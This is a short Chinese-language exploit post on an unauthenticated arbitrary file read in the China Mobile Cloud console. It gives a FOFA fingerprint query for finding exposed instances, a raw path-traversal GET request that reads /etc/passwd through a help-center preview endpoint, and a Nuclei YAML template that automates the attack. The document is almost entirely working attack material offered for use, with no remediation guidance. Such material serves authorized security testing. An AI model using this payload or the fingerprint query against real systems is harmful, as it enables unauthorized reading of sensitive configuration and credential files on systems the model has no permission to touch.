移动云控制台存在任意文件读取漏洞
應用程式安全 2743
移动云控制台是一套用于统一查看和管理移动云产品及服务的系统,移动云控制台存在文件任意读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息
fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
poc
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: ip
Yaml
id: cmecloud-console-readfile
info:
name: 移动云控制台存在任意文件读取
author: onewin
severity: high
description: 移动云控制台存在任意文件读取
http:
- raw:
- |+
@timeout: 30s
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root"
part: body